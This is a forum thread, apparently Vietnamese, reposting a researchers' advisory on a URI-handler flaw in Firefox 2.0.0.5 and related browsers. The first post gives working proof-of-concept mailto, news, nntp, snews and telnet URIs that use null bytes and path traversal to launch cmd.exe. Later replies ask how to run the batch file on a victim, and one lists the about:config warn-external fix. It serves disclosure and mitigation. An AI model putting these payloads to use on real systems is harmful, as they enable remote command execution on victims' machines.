Latest posts for the topic "Remote Command Exec (FireFox 2.0.0.5 et al)"

Remote Command Exec (FireFox 2.0.0.5 et al)

114v — GMT

By: Nate McFeters (nate dot mcfeters -at- gmail) Billy (BK) Rios (billy dot rios -at- gmail) Tested in FireFox 2.0.0.5 (and 3.0a6), Netscape Navigator 9, and Mozilla browser. ****NOTE**** These examples were created for WinXP SP2 with no external mail programs installed (outlook, notes…etc). If you have an external mail program installed, these examples may not work on your machine (as the URI handling may have changed). Once again, a flaw in the URI handling behavior allows for remote command execution. UNREGISTER ALL UNNECESSARY URIs NOW! This example shows flaws in Firefox, Netscape, and Mozilla browsers… other browsers are affected by related vulnerabilities. Developers who intend to (or have already) registered URIs for their applications MUST UNDERSTAND that registering a URI handler exponentially increases the attack surface for that application. Please review your registered URI handling mechanisms and audit the functionality called by those URIs… These can be launched with no user warning (simply click on the link): Code:

mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

nntp:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

news:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

snews:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

telnet:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

Remote Command Exec (FireFox 2.0.0.5 et al)

L0ng3ta — GMT

Lỗi thú vị đây ... khi nhấn vào cái link nào phải cẩn thận mới được :D) :D) :D)

Remote Command Exec (FireFox 2.0.0.5 et al)

minhquan1712 — GMT

These examples were created for WinXP SP2 with no external mail programs installed (outlook, notes…etc). If you have an external mail program installed, these examples may not work on your machine (as the URI handling may have changed).

có fải ý nó nói là cái này ko hoạt động trên winSP2 có cài outlook,note pad ko nhỉ? ^^. Sẵn cho em hỏi làm sao mình có thể chạy được file blah.bat đó trên máy victim được nhỉ?Nếu biết được cách thì nó nguy hiểm thiệt ^^

Re: Remote Command Exec (FireFox 2.0.0.5 et al)

conmale — GMT

Lỗi này đã được fixed ở phiên bản 2.0.0.6 Nếu ai còn dùng 2.0.0.5 hoặc cũ hơn, gõ about:config trên thanh địa chỉ và tìm từ khóa warn-external rồi đổi hết giá trị thành true. Có 5 giá trị để xem và đổi: Code:

network.protocol-handler.warn-external-default
network.protocol-handler.warn-external.mailto
network.protocol-handler.warn-external.news
network.protocol-handler.warn-external.nntp
network.protocol-handler.warn-external.snews

Remote Command Exec (FireFox 2.0.0.5 et al)

lamhoang20002000 — GMT

Anh Comale ơi, để test bug này, có phải tạo một link . ----> Open with Firefox and click the link? Mong anh chỉ dùm. Mà file blah.bat ấy là do mình tạo ra hay là cái gì vậy???

Re: Remote Command Exec (FireFox 2.0.0.5 et al)

smile_sad — GMT

hi hi của em tìm ko ra mấy cái đó ...may quá trời ơi :lol:)